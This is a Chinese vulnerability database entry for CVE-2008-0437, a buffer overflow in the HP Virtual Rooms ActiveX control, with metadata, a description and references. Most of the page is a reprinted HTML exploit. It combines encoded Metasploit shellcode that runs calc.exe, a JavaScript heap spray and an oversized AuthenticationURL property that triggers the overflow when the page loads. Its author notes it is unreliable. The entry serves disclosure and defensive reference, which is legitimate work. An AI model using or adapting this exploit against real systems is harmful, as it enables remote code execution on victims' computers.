HP Virtual Rooms hpvirtualrooms14 ActiveX控件多个缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114376 漏洞类型 缓冲区溢出
发布时间 2008-01-22 更新时间 2008-09-05
CVE编号 CVE-2008-0437 CNNVD-ID CNNVD-200801-370
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/4959
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200801-370
|漏洞详情
HPVirtualRooms是一套在线协作、培训和支持工具。HPVirtualRooms的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。HPVirtualRooms的WebHPVCInstall.HPVirtualRooms14ActiveX控件(HPVirtualRooms14.dll,00000014-9593-4264-8B29-930B3E4EDCCD)没有正确地验证分配给AuthenticationURL、PortalAPIURL、cabroot等属性的字符串,如果用户受骗访问了恶意站点并对这些属性分配了超长字符的话,就可能触发缓冲区溢出,导致执行任意指令。
|漏洞EXP
<!-- 
HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit
written by e.b.
Note that I did not have time to work out some heap fragmentation issues so this code is NOT reliable...
Tested on Windows XP SP2(fully patched) English, IE6, hpvirtualrooms14.dll version 1.0.0.100
Thanks to rgod, h.d.m. and the Metasploit crew 
-->
<html>
 <head>
  <title>HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
   


// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com 
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                          "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                          "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                          "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                          "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                          "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                          "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                          "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                          "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                          "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                          "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                          "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                          "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                          "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                          "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                          "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                          "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                          "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                          "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                          "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                          "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                          "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                          "%u314e%u7475%u7038%u7765%u4370");



	var bigblock = unescape("%u9090%u9090");
	var headersize = 20;
	var slackspace = headersize + shellcode1.length;
	while (bigblock.length < slackspace) bigblock += bigblock;
	var fillblock = bigblock.substring(0,slackspace);
	var block = bigblock.substring(0,bigblock.length - slackspace);
	while (block.length + slackspace < 0x40000) block = block + block + fillblock;

	

	var memory = new Array();
	for (i = 0; i < 700; i++){ memory[i] = block + shellcode1 }
		
	var buf = "";
	for (i = 0; i < 15000; i++) { buf = buf + unescape("%u0A0A%u0A0A") }

 	obj.AuthenticationURL = buf;  
 } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:00000014-9593-4264-8B29-930B3E4EDCCD">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-22]
|参考资料

来源:BID
名称:27384
链接:http://www.securityfocus.com/bid/27384
来源:VUPEN
名称:ADV-2008-0236
链接:http://www.frsirt.com/english/advisories/2008/0236
来源:SECUNIA
名称:28595
链接:http://secunia.com/advisories/28595
来源:FULLDISC
名称:20080122HPVirtualRoomsWebHPVCInstallControlMultipleBufferOverflows
链接:http://marc.info/?l=full-disclosure&m=120098751528333&w=2
来源:XF
名称:hpvirtualrooms-hpvirtualrooms14-activex-bo(39836)
链接:http://xforce.iss.net/xforce/xfdb/39836
来源:MILW0RM
名称:4959
链接:http://www.milw0rm.com/exploits/4959